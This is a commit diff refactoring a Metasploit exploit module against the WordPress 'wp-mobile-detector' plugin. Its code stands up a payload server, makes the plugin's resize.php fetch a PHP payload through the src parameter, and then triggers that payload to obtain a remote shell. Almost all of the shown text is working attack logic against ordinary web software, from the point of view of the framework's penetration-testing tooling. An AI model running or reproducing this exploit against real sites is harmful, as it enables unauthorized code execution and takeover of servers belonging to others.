Clean up module

wvu · wvu · commit 3847a6849473 · 2017-11-01T13:23:32.000-05:00
diff --git a/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb b/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb
@@ -6,9 +6,9 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::FileDropper
   include Msf::Exploit::Remote::HTTP::Wordpress
   include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(update_info(
@@ -50,9 +50,6 @@ def check
   end
 
   def exploit
-    if datastore['SRVHOST'] == '0.0.0.0'
-      fail_with(Failure::BadConfig, 'SRVHOST must be an IP address accessible from rhost')
-    end
     payload_name = rand_text_alphanumeric(10) + '.php'
 
     # First check to see if the file is written already, if it is cache wont retrieve it from us
@@ -69,29 +66,22 @@ def exploit
 
     def on_request_uri(cli, _request)
       print_good('Payload requested on server, sending')
-      send_response(cli, payload.encoded, {})
+      send_response(cli, payload.encoded)
     end
 
     print_status('Starting Payload Server')
-    payload_url = '/' + payload_name
-    start_service('Uri' => {
-                    'Path' => payload_url,
-                    'Proc' => proc do |cli, req|
-                       on_request_uri(cli, req)
-                       end
-                    })
+    start_service('Path' => "/#{payload_name}")
 
-    payload_full_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + payload_url
-    print_status("Uploading payload via #{normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'resize.php')}?src=#{payload_full_url}")
+    print_status("Uploading payload via #{normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'resize.php')}?src=#{get_uri}")
 
     res = send_request_cgi(
       'global' => true,
       'method'  => 'GET',
       'uri'     => normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'resize.php'),
-      'vars_get' => {'src' => payload_full_url}
+      'vars_get' => {'src' => get_uri}
     )
 
-   if res && res.code == 200
+    if res && res.code == 200
       print_good('Sleeping 5 seconds for payload upload')
       register_files_for_cleanup(payload_name)
 
@@ -104,7 +94,6 @@ def on_request_uri(cli, _request)
       })
       # wait for callback, without this we exit too fast and miss our shell
       Rex.sleep(2)
-      handler
     else
       if res.nil?
         fail_with(Failure::Unreachable, 'No response from the target')
